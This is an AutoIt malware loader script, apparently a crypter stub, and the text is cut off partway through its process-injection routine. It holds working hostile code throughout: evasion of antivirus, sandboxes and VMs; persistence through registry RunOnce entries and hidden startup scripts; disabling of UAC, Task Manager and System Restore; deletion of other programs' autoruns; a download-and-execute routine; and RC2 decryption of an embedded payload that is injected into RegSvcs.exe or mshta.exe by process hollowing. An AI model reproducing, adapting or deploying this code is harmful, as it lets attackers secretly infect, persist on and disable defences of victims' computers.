5943564.IFW



#RequireAdmin

;hwid=F65F986EE6D635C25CB12C59AD6B4A7587500B110x75736572
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)

$path = "asvep"

$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@scriptfullpath)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_temp = FileGetShortName(@TempDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)

FileSetAttrib($uniscriptdir, "+SHR")

$Dir = $uniscriptfullpath
$STR = StringSplit($Dir, "\\", 1)
$directory = False

For $i = 1 To $STR[0]
    If $STR[$i] = $path And $Dir = $unicode_userprofile & "\\" & $path & "\\" & @ScriptName Then
        $directory = True
        ExitLoop
    EndIf
Next

If $STR[0] - 1 And $directory = False Then
bsod()
EndIf

;options----------------------------------------------------------------------------------------------

;delay
Local $delay = IniRead($uniscriptdir & "\65901.PPZ", "delay1", "delay2", "NotFound")
If $delay = "delay3" Then
    delay()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;mutex
Local $mutex = IniRead($uniscriptdir & "\65901.PPZ", "mutex1", "mutex2", "NotFound")
If $mutex = "mutex3" Then
    mutex()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;startup
Local $startup = IniRead($uniscriptdir & "\65901.PPZ", "5378250", "6296134", "NotFound")
If $startup = "4064234" Then
    startup()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;antis
Local $antis = IniRead($uniscriptdir & "\65901.PPZ", "antis1", "antis2", "NotFound")
If $antis = "antis3" Then
    antis()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;fake message
Local $fake = IniRead($uniscriptdir & "\65901.PPZ", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
    fakemessage()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;botkiller
Local $botkiller = IniRead($uniscriptdir & "\65901.PPZ", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
    botkiller()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;downloader
Local $downloader = IniRead($uniscriptdir & "\65901.PPZ", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
    downloader()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;disable uac
Local $uac = IniRead($uniscriptdir & "\65901.PPZ", "6404000", "6662859", "NotFound")
If $uac = "9455413" Then
    disable_uac()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;Disable System Restore
Local $systemrestore = IniRead($uniscriptdir & "\65901.PPZ", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
    disable_syste_restore()
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;antitask
Local $antitask = IniRead($uniscriptdir & "\65901.PPZ", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
    antitask()
Else
EndIf

;Functions--------------------------------------------------------------------------------------------------------------------------
;delay
Func delay()
    $counter = 0
    While $counter <= 5
        Sleep(5000)
        ShellExecute(@SystemDir & "\mshta.exe")
        $counter = $counter + 1
        _RunDos("taskkill /IM mshta.exe")
    WEnd
EndFunc
;-----------------------------------------------------------------------------------------------------
;System Hide
Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1) ; don't show folder options
Regwrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0) ; don't show hidden files
EndFunc
;-----------------------------------------------------------------------------------------------------
;fake message
Func fakemessage()

$type = IniRead($uniscriptdir & "\65901.PPZ", "messagetype1", "messagetype2","NotFound")
$title = IniRead($uniscriptdir & "\65901.PPZ", "messagetitle1", "messagetitle2","NotFound")
$message = IniRead($uniscriptdir & "\65901.PPZ", "messagetext1", "messagetext2","NotFound")

If FileExists($unicode_userprofile & "\\" & $path & "\check.txt") Then
;do nothing
Else
MsgBox($type,$title,$message)
FileWrite($unicode_userprofile & "\\" & $path & "\check.txt", "")
EndIf
EndFunc
;-----------------------------------------------------------------------------------------------------
;mutex
Func mutex()
$scriptname = "winupdate.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
;-----------------------------------------------------------------------------------------------------
;anti task manager
func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
if Not ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
;-----------------------------------------------------------------------------------------------------
;disable uac
func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" , "EnableLUA")
if Not ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" , "EnableLUA" , "REG_DWORD" , "0")
EndIf
EndFunc
;-----------------------------------------------------------------------------------------------------
;startup
Func startup()
$bUAC = _CheckElevationEnabled()
If $bUAC = 0 Then
;do nothing
Else
FileCreateShortcut($unicode_userprofile & "\\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk","+SH")
EndIf

    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
    If Not FileExists($unicode_userprofile & "\\" & $path & "\start.vbs") Then
        Local $bat = FileOpen($unicode_userprofile & "\\" & $path & "\start.cmd", 1)
        $autoit3 = "winupdate.exe"
        FileWrite($bat, "@echo off" & @CRLF & "cd " & "%userprofile%\" & $path & "\\" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"')
        FileClose($bat)
        Local $vbs = FileOpen($unicode_userprofile & "\\" & $path & "\start.vbs", 1)
        FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & $unicode_userprofile & "\\" & $path & "\\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
        FileClose($vbs)
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
        FileSetAttrib($unicode_userprofile & "\\" & $path & "\start.vbs","+SHR")
        FileSetAttrib($unicode_userprofile & "\\" & $path & "\start.cmd","+SHR")

        if FileExists($unicode_startup & "\start.lnk") Then
        FileDelete($unicode_startup & "\start.lnk")
        EndIf
    Else
    EndIf


EndFunc

;Checks if Use Access Control (UAC) is Enabled.
Func _CheckElevationEnabled()
   Local $struct = DllStructCreate("BOOL")
   Local $aRtn = DllCall("kernel32.dll","DWORD","CheckElevationEnabled","ptr", DllStructGetPtr($struct))
   If @error Then
     Return SetError(@error)
   EndIf
   Return SetError($aRtn[0],0,DllStructGetData($struct,1))
EndFunc
;-----------------------------------------------------------------------------------------------------

;Antis
func antis()
;anti sandbox
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf

;anti vm's
if ProcessExists("VboxService.exe") Then
Exit
EndIf

if ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc

;-----------------------------------------------------------------------------------------------------
;Persistence
func persistence()
if processexists("RegSvcs.exe") then
;do nothing
else
$pathtovbs = ($uniscriptdir & "\\" & "7246235.vbe")
ShellExecute($pathtovbs)
exit
endif
endfunc
;------------------------------------------------------------------------------------------------------
;Downloader
Func downloader()
if FileExists($unicode_userprofile & "\\" & $path & "\dl.txt") Then
;do nothing
Else

FileWrite($unicode_userprofile & "\\" & $path & "\dl.txt","")

; Advanced example - downloading in the background
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hDownload = InetGet("replace-me-url", $unicode_temp & "\\" & $random_download_name, 1, 1)
Do
    Sleep(250)
Until InetGetInfo($hDownload, 2) ; Check if the download is complete.
Local $nBytes = InetGetInfo($hDownload, 0)
InetClose($hDownload) ; Close the handle to release resources.
ShellExecute($unicode_temp & "\\" & $random_download_name)
EndIf
EndFunc
;-----------------------------------------------------------------------------------------------------
;BSOD
Func bsod()
    $a = ProcessList()
    For $i = 1 To UBound($a) - 1
        ProcessClose($a[$i][0])
    Next
    Exit
EndFunc

;-----------------------------------------------------------------------------------------------------
;botkiller
Func botkiller()
        ;delete
        RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")

        ;restore
        RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
        ;Else

        ;delete
        RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")

        ;restore
        RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")

        FileDelete(@StartupDir & "\*.*")
EndFunc   ;==>botkiller

func disable_syste_restore()
if FileExists($uniscriptdir & "\check.txt") Then
;do nothing
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt","")
EndIf
EndFunc

;data from crypt.au3 & process.au3:--------------------------------------------------------------------------------------------------------------------------

Func _RunDos($sCommand)
    Local $nResult = RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
    Return SetError(@error, @extended, $nResult)
EndFunc   ;==>_RunDos

Global Const $PROV_RSA_FULL = 0x1
Global Const $PROV_RSA_AES = 24
Global Const $CRYPT_VERIFYCONTEXT = 0xF0000000
Global Const $HP_HASHSIZE = 0x0004
Global Const $HP_HASHVAL = 0x0002
Global Const $CRYPT_EXPORTABLE = 0x00000001
Global Const $CRYPT_USERDATA = 1

Global Const $CALG_MD2 = 0x00008001
Global Const $CALG_MD4 = 0x00008002
Global Const $CALG_MD5 = 0x00008003
Global Const $CALG_SHA1 = 0x00008004
Global Const $CALG_3DES = 0x00006603
Global Const $CALG_AES_128 = 0x0000660e
Global Const $CALG_AES_192 = 0x0000660f
Global Const $CALG_AES_256 = 0x00006610
Global Const $CALG_DES = 0x00006601
Global Const $CALG_RC2 = 0x00006602
Global Const $CALG_RC4 = 0x00006801
Global Const $CALG_USERKEY = 0
Global $__g_aCryptInternalData[3]


Func _Crypt_EncryptData($vData, $vCryptKey, $iALG_ID, $fFinal = True)
    Local $hBuff
    Local $iError
    Local $vReturn
    Local $ReqBuffSize
    Local $aRet
    _Crypt_Startup()

    Do
        If $iALG_ID <> $CALG_USERKEY Then
            $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID)
            If @error Then
                $iError = 1
                $vReturn = -1
                ExitLoop
            EndIf
        EndIf

        $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vData), "dword", 0)
        If @error Or Not $aRet[0] Then
            $iError = 2
            $vReturn = -1
            ExitLoop
        EndIf

        $ReqBuffSize = $aRet[6]
        $hBuff = DllStructCreate("byte[" & $ReqBuffSize & "]")
        DllStructSetData($hBuff, 1, $vData)
        $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "struct*", $hBuff, "dword*", BinaryLen($vData), "dword", DllStructGetSize($hBuff))
        If @error Or Not $aRet[0] Then
            $iError = 3
            $vReturn = -1
            ExitLoop
        EndIf
        $iError = 0
        $vReturn = DllStructGetData($hBuff, 1)
    Until True

    Return $vReturn
EndFunc   ;==>_Crypt_EncryptData

Func _Crypt_DecryptData($vData, $vCryptKey, $iALG_ID, $fFinal = True)
    Local $hBuff
    Local $iError
    Local $vReturn
    Local $hTempStruct
    Local $iPlainTextSize
    Local $aRet
    _Crypt_Startup()

    Do
        If $iALG_ID <> $CALG_USERKEY Then
            $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID)
            If @error Then
                $iError = 1
                $vReturn = -1
                ExitLoop
            EndIf
        EndIf

        $hBuff = DllStructCreate("byte[" & BinaryLen($vData) + 1000 & "]")
        DllStructSetData($hBuff, 1, $vData)
        $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDecrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "struct*", $hBuff, "dword*", BinaryLen($vData))
        If @error Or Not $aRet[0] Then
            $iError = 2
            $vReturn = -1
            ExitLoop
        EndIf

        $iPlainTextSize = $aRet[6]
        $hTempStruct = DllStructCreate("byte[" & $iPlainTextSize & "]", DllStructGetPtr($hBuff))
        $iError = 0
        $vReturn = DllStructGetData($hTempStruct, 1)
    Until True

    Return $vReturn
EndFunc   ;==>_Crypt_DecryptData


Func _Crypt_Startup()
    If __Crypt_RefCount() = 0 Then
        Local $hAdvapi32 = DllOpen("Advapi32.dll")
        If @error Then Return SetError(1, 0, False)
        __Crypt_DllHandleSet($hAdvapi32)
        Local $aRet
        Local $iProviderID = $PROV_RSA_AES
        If @OSVersion = "WIN_2000" Then $iProviderID = $PROV_RSA_FULL ; Provide backwards compatibility with win2000
        $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iProviderID, "dword", $CRYPT_VERIFYCONTEXT)
        If @error Or Not $aRet[0] Then
            DllClose(__Crypt_DllHandle())
            Return SetError(2, 0, False)
        Else
            __Crypt_ContextSet($aRet[1])
            ; Fall through to success.
        EndIf
    EndIf
    __Crypt_RefCountInc()
    Return True
EndFunc   ;==>_Crypt_Startup


Func _Crypt_DeriveKey($vPassword, $iALG_ID, $iHash_ALG_ID = $CALG_MD5)
    Local $aRet
    Local $hCryptHash
    Local $hBuff
    Local $iError
    Local $vReturn

    _Crypt_Startup()
    Do
        ; Create Hash object
        $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptCreateHash", "handle", __Crypt_Context(), "uint", $iHash_ALG_ID, "ptr", 0, "dword", 0, "handle*", 0)
        If @error Or Not $aRet[0] Then
            $iError = 1
            $vReturn = -1
            ExitLoop
        EndIf

        $hCryptHash = $aRet[5]
        $hBuff = DllStructCreate("byte[" & BinaryLen($vPassword) & "]")
        DllStructSetData($hBuff, 1, $vPassword)
        $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptHashData", "handle", $hCryptHash, "struct*", $hBuff, "dword", DllStructGetSize($hBuff), "dword", $CRYPT_USERDATA)
        If @error Or Not $aRet[0] Then
            $iError = 2
            $vReturn = -1
            ExitLoop
        EndIf

        ; Create key
        $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDeriveKey", "handle", __Crypt_Context(), "uint", $iALG_ID, "handle", $hCryptHash, "dword", $CRYPT_EXPORTABLE, "handle*", 0)
        If @error Or Not $aRet[0] Then
            $iError = 3
            $vReturn = -1
            ExitLoop
        EndIf
        $iError = 0
        $vReturn = $aRet[5]
    Until True
    If $hCryptHash <> 0 Then DllCall(__Crypt_DllHandle(), "bool", "CryptDestroyHash", "handle", $hCryptHash)

    Return SetError($iError, 0, $vReturn)
EndFunc   ;==>_Crypt_DeriveKey

Func __Crypt_ContextSet($hCryptContext)
    $__g_aCryptInternalData[2] = $hCryptContext
EndFunc   ;==>__Crypt_ContextSet
Func __Crypt_Context()
    Return $__g_aCryptInternalData[2]
EndFunc   ;==>__Crypt_Context
Func __Crypt_DllHandleSet($hAdvapi32)
    $__g_aCryptInternalData[1] = $hAdvapi32
EndFunc   ;==>__Crypt_DllHandleSet
Func __Crypt_DllHandle()
    Return $__g_aCryptInternalData[1]
EndFunc   ;==>__Crypt_DllHandle
Func __Crypt_RefCountDec()
    If $__g_aCryptInternalData[0] > 0 Then $__g_aCryptInternalData[0] -= 1
EndFunc   ;==>__Crypt_RefCountDec
Func __Crypt_RefCountInc()
    $__g_aCryptInternalData[0] += 1
EndFunc   ;==>__Crypt_RefCountInc
Func __Crypt_RefCount()
    Return $__g_aCryptInternalData[0]
EndFunc   ;==>__Crypt_RefCount

;end of data from crypt.au3

SubMain()

Func SubMain()
$sKey = IniRead($uniscriptdir & "\65901.PPZ", "1109091", "1109091", "NotFound")
$sAppPath1 = FileGetShortName(@ScriptDir & "\20070.RQT")
$sAppPath = FileRead(FileOpen($sAppPath1,16))
$sArquive = _Crypt_DecryptData($sAppPath, $sKey, $CALG_RC2)
 _RunPE($sArquive)
  EndFunc


Func Info($GetFileData, $StringToGet) ; this is the func that get the settings of the Binded file to be decrypted
    Return StringTrimLeft($GetFileData, StringInStr($GetFileData, $StringToGet) - 1 + StringLen($StringToGet))
EndFunc

;RUNPE

    Func _RunPE($bbinaryimage, $scommandline = "")
    #region 1. DETERMINE INTERPRETER TYPE
    Local $fautoitx64 = @AutoItX64
    #region 2. PREDPROCESSING PASSED
    Local $bbinary = Binary($bbinaryimage)
    Local $tbinary = DllStructCreate("BYTE[" & BinaryLen($bbinary) & "]")
    DllStructSetData($tbinary, 1, $bbinary)
    Local $ppointer = DllStructGetPtr($tbinary)
    #region 3. CREATING NEW PROCESS
    Local $tstartupinfo = DllStructCreate("DWORD  CBSIZE;" & "PTR RESERVED;" & "PTR DESKTOP;" & "PTR TITLE;" & "DWORD X;" & "DWORD Y;" & "DWORD XSIZE;" & "DWORD YSIZE;" & "DWORD XCOUNTCHARS;" & "DWORD YCOUNTCHARS;" & "DWORD FILLATTRIBUTE;" & "DWORD FLAGS;" & "WORD SHOWWINDOW;" & "WORD RESERVED2;" & "PTR RESERVED2;" & "PTR HSTDINPUT;" & "PTR HSTDOUTPUT;" & "PTR HSTDERROR")
    Local $tprocess_information = DllStructCreate("PTR PROCESS;" & "PTR THREAD;" & "DWORD PROCESSID;" & "DWORD THREADID")

    $Injecto2 = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe")
    $Injecto4 = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe")
    $Inject_other = ($unicode_system & "\mshta.exe")

        If FileExists($Injecto4) Then
            Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Injecto4, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))

        Elseif FileExists($Injecto2) then
            Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Injecto2, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))

        Else
            Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Inject_other, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
        EndIf

    If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
    Local $hprocess = DllStructGetData($tprocess_information, "PROCESS")
    Local $hthread = DllStructGetData($tprocess_information, "THREAD")
    If $fautoitx64 And __runpe_iswow64process($hprocess) Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(2, 0, 0)
    EndIf
    #region 4. FILL CONTEXT STRUCTURE
    Local $irunflag, $tcontext
    If $fautoitx64 Then
        If @OSArch = "X64" Then
            $irunflag = 2
            $tcontext = DllStructCreate("ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & "DWORD CONTEXTFLAGS; DWORD MXCSR;" & "WORD SEGCS; WORD SEGDS; WORD SEGES; WORD SEGFS; WORD SEGGS; WORD SEGSS; DWORD EFLAGS;" & "UINT64 DR0; UINT64 DR1; UINT64 DR2; UINT64 DR3; UINT64 DR6; UINT64 DR7;" & "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; UINT64 R13; UINT64 R14; UINT64 R15;" & "UINT64 RIP;" & "UINT64 HEADER[4]; UINT64 LEGACY[16]; UINT64 XMM0[2]; UINT64 XMM1[2]; UINT64 XMM2[2]; UINT64 XMM3[2]; UINT64 XMM4[2]; UINT64 XMM5[2]; UINT64 XMM6[2]; UINT64 XMM7[2]; UINT64 XMM8[2]; UINT64 XMM9[2]; UINT64 XMM10[2]; UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; UINT64 XMM14[2]; UINT64 XMM15[2];" & "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; UINT64 LASTEXCEPTIONFROMRIP")
        Else
            $irunflag = 3
            DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
            Return SetError(102, 0, 0)
        EndIf
    Else
        $irunflag = 1
        $tcontext = DllStructCreate("DWORD CONTEXTFLAGS;" & "DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & "DWORD CONTROLWORD; DWORD STATUSWORD; DWORD TAGWORD; DWORD ERROROFFSET; DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & "DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & "DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & "DWORD EBP; DWORD EIP; DWORD SEGCS; DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & "BYTE EXTENDEDREGISTERS[512]")
    EndIf
    Local $context_full
    Switch $irunflag
        ;
        Case 1
            ;
            $context_full = 65543
        Case 2
            $context_full = 1048583
            ;
        Case 3
            ;
            $context_full = 524327
            ;
    EndSwitch
    DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full)
    $acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
    If @error Or Not $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(3, 0, 0)
    EndIf
    Local $ppeb
    Switch $irunflag
        Case 1
            $ppeb = DllStructGetData($tcontext, "EBX")
        Case 2
            $ppeb = DllStructGetData($tcontext, "RDX")
        Case 3
    EndSwitch
    #region 5. READ PE-FORMAT
    Local $timage_dos_header = DllStructCreate("CHAR MAGIC[2];" & "WORD BYTESONLASTPAGE;" & "WORD PAGES;" & "WORD RELOCATIONS;" & "WORD SIZEOFHEADER;" & "WORD MINIMUMEXTRA;" & "WORD MAXIMUMEXTRA;" & "WORD SS;" & "WORD SP;" & "WORD CHECKSUM;" & "WORD IP;" & "WORD CS;" & "WORD RELOCATION;" & "WORD OVERLAY;" & "CHAR RESERVED[8];" & "WORD OEMIDENTIFIER;" & "WORD OEMINFORMATION;" & "CHAR RESERVED2[20];" & "DWORD ADDRESSOFNEWEXEHEADER", $ppointer)
    Local $pheaders_new = $ppointer
    $ppointer += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER")
    Local $smagic = DllStructGetData($timage_dos_header, "MAGIC")
    If Not ($smagic == "MZ") Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(4, 0, 0)
    EndIf
    Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $ppointer)
    $ppointer += 4
    If DllStructGetData($timage_nt_signature, "SIGNATURE") <> 17744 Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(5, 0, 0)
    EndIf
    Local $timage_file_header = DllStructCreate("WORD MACHINE;" & "WORD NUMBEROFSECTIONS;" & "DWORD TIMEDATESTAMP;" & "DWORD POINTERTOSYMBOLTABLE;" & "DWORD NUMBEROFSYMBOLS;" & "WORD SIZEOFOPTIONALHEADER;" & "WORD CHARACTERISTICS", $ppointer)
    Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS")
    $ppointer += 20
    Local $tmagic = DllStructCreate("WORD MAGIC;", $ppointer)
    Local $imagic = DllStructGetData($tmagic, 1)
    Local $timage_optional_header
    If $imagic = 267 Then
        If $fautoitx64 Then
            DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
            Return SetError(6, 0, 0)
        EndIf
        $timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "DWORD BASEOFDATA;" & "DWORD IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "DWORD SIZEOFSTACKRESERVE;" & "DWORD SIZEOFSTACKCOMMIT;" & "DWORD SIZEOFHEAPRESERVE;" & "DWORD SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $ppointer)
        $ppointer += 96
    ElseIf $imagic = 523 Then
        If Not $fautoitx64 Then
            DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
            Return SetError(6, 0, 0)
        EndIf
        $timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "UINT64 IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "UINT64 SIZEOFSTACKRESERVE;" & "UINT64 SIZEOFSTACKCOMMIT;" & "UINT64 SIZEOFHEAPRESERVE;" & "UINT64 SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $ppointer)
        $ppointer += 112
    Else
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(6, 0, 0)
    EndIf
    Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT")
    Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS")
    Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE")
    Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE")
    $ppointer += 8
    $ppointer += 8
    $ppointer += 24
    Local $timage_directory_entry_basereloc = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZE", $ppointer)
    Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS")
    Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE")
    Local $frelocatable
    If $paddressnewbasereloc And $isizebasereloc Then $frelocatable = True
    If Not $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
    $ppointer += 88
    #region 6. ALLOCATE 'NEW' MEMORY SPACE
    Local $frelocate
    Local $pzeropoint
    If $frelocatable Then
        $pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
        If @error Then
            $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
            If @error Then
                __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
                $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
                If @error Then
                    DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
                    Return SetError(101, 1, 0)
                EndIf
            EndIf
        EndIf
        $frelocate = True
    Else
